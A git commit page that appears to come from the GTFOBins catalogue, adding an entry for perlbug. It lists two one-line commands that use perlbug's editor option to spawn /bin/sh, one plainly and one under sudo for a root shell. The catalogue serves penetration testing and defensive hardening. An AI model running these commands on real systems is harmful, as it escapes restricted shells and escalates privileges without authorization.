Add perlbug

This commit is contained in:
Andrea Cardaci 2022-12-16 13:57:14 +01:00 committed by GitHub
commit e34134e353
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

7
_gtfobins/perlbug.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
shell:
- code: perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
sudo:
- code: sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
---